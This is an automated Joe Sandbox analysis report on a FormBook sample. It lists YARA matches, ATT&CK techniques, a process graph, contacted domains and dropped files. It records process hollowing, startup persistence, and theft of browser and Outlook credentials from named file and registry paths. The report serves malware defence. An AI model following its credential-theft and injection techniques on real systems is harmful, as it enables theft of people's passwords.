          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection512Disable or Modify Tools1OS Credential Dumping1File and Directory Discovery3Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Credential API Hooking1System Information Discovery113Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSSecurity Software Discovery141Distributed Component Object ModelCredential API Hooking1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRootkit1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion4/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection512Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323830 Sample: f5cZJ0WC0H Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 61 www.procertinspections.com 2->61 63 procertinspections.com 2->63 65 g.msn.com 2->65 73 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Sigma detected: Steal Google chrome login data 2->77 79 8 other signatures 2->79 14 f5cZJ0WC0H.exe 3 2->14         started        16 f5cZJ0WC0H.exe 2 2->16         started        signatures3 process4 signatures5 19 cmd.exe 1 14->19         started        69 Injects a PE file into a foreign processes 16->69 22 f5cZJ0WC0H.exe 16->22         started        process6 signatures7 81 Suspicious powershell command line found 19->81 24 powershell.exe 17 19->24         started        26 conhost.exe 19->26         started        28 timeout.exe 1 19->28         started        83 Modifies the context of a thread in another process (thread injection) 22->83 85 Maps a DLL or memory area into another process 22->85 87 Sample uses process hollowing technique 22->87 process8 process9 30 f5cZJ0WC0H.exe 3 24->30         started        33 wscript.exe 24->33         started        signatures10 107 Injects a PE file into a foreign processes 30->107 35 f5cZJ0WC0H.exe 30->35         started        109 Drops PE files to the startup folder 33->109 process11 signatures12 89 Modifies the context of a thread in another process (thread injection) 35->89 91 Maps a DLL or memory area into another process 35->91 93 Sample uses process hollowing technique 35->93 95 Queues an APC in another process (thread injection) 35->95 38 explorer.exe 35->38 injected process13 dnsIp14 67 www.therealnarzkollections.com 38->67 41 help.exe 18 38->41         started        45 ipconfig.exe 38->45         started        47 autoconv.exe 38->47         started        process15 file16 57 C:\Users\user\AppData\...\7-Nlogrv.ini, data 41->57 dropped 59 C:\Users\user\AppData\...\7-Nlogri.ini, data 41->59 dropped 97 Detected FormBook malware 41->97 99 Tries to steal Mail credentials (via file access) 41->99 101 Tries to harvest and steal browser information (history, passwords, etc) 41->101 105 2 other signatures 41->105 49 cmd.exe 2 41->49         started        103 Tries to detect virtualization through RDTSC time measurements 45->103 signatures17 process18 file19 55 C:\Users\user\AppData\Local\Temp\DB1, SQLite 49->55 dropped 71 Tries to harvest and steal browser information (history, passwords, etc) 49->71 53 conhost.exe 49->53         started        signatures20 process21

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          23.2.f5cZJ0WC0H.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          21.2.f5cZJ0WC0H.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.procertinspections.com/zsh/0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.procertinspections.com0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.pngd0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          procertinspections.com
          		34.98.99.30
          		truetrue
            		unknown
            www.therealnarzkollections.com
            		unknown
            		unknowntrue
              		unknown
              www.procertinspections.com
              		unknown
              		unknowntrue
                		unknown
                g.msn.com
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.procertinspections.com/zsh/help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                https://go.micropowershell.exe, 00000005.00000002.341468263.00000000057B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterdpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.carterandcone.comlexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.procertinspections.comhelp.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmldpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pngdpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fonts.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.339869504.0000000005441000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.sakkal.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    No contacted IP infos

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:323830
                                                    Start date:27.11.2020
                                                    Start time:15:57:04
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 12m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:f5cZJ0WC0H (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:31
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.adwa.spyw.evad.winEXE@23/11@5/0
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 6.9% (good quality ratio 6.3%)
                                                    • Quality average: 71.4%
                                                    • Quality standard deviation: 30.8%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 110
                                                    • Number of non-executed functions: 131
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.210.248.85, 168.61.161.212, 52.255.188.83, 104.43.139.144, 51.104.144.132, 20.54.26.129, 93.184.221.240, 8.248.113.254, 67.26.83.254, 8.253.204.120, 8.253.95.249, 8.241.121.254, 52.242.211.89, 52.142.114.176, 92.122.213.194, 92.122.213.247
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323830/sample/f5cZJ0WC0H.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:57:58API Interceptor3x Sleep call for process: f5cZJ0WC0H.exe modified
                                                    15:58:32API Interceptor34x Sleep call for process: powershell.exe modified
                                                    15:58:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f5cZJ0WC0H.exe.log
                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.355304211458859
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                    MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                    SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                    SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                    SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                    Malicious:false
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
